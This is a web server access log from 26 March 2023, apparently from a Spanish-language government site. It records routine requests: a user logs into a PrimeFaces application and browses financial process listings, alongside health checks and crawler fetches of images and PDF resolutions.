201.245.192.253 - - [26/Mar/2023:12:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42082
201.245.192.253 - - [26/Mar/2023:12:20:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43321
192.168.175.240 - - [26/Mar/2023:12:20:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:12:21:18 -0500] "GET / HTTP/1.1" 200 4720
173.252.95.8 - - [26/Mar/2023:12:21:18 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
201.245.192.253 - - [26/Mar/2023:12:21:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
186.28.79.255 - - [26/Mar/2023:12:21:48 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.28.79.255 - - [26/Mar/2023:12:21:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:49 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
186.28.79.255 - - [26/Mar/2023:12:21:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:49 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.28.79.255 - - [26/Mar/2023:12:21:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:52 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:53 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:21:53 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.28.79.255 - - [26/Mar/2023:12:21:53 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.28.79.255 - - [26/Mar/2023:12:22:00 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16071
186.28.79.255 - - [26/Mar/2023:12:22:01 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.28.79.255 - - [26/Mar/2023:12:22:02 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.28.79.255 - - [26/Mar/2023:12:22:04 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
192.144.114.138 - - [26/Mar/2023:12:22:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
192.168.175.240 - - [26/Mar/2023:12:22:18 -0500] "GET / HTTP/1.1" 200 4720
186.28.79.255 - - [26/Mar/2023:12:22:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:49 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
186.28.79.255 - - [26/Mar/2023:12:22:49 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 61263
186.28.79.255 - - [26/Mar/2023:12:22:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:22:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.28.79.255 - - [26/Mar/2023:12:22:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 19886
157.55.39.217 - - [26/Mar/2023:12:22:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3011.pdf HTTP/1.1" 200 371884
186.28.79.255 - - [26/Mar/2023:12:22:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 19833
186.28.79.255 - - [26/Mar/2023:12:23:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28322
186.28.79.255 - - [26/Mar/2023:12:23:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 136612
186.28.79.255 - - [26/Mar/2023:12:23:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.168.175.240 - - [26/Mar/2023:12:23:18 -0500] "GET / HTTP/1.1" 200 4720
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34800
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.79.255 - - [26/Mar/2023:12:23:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
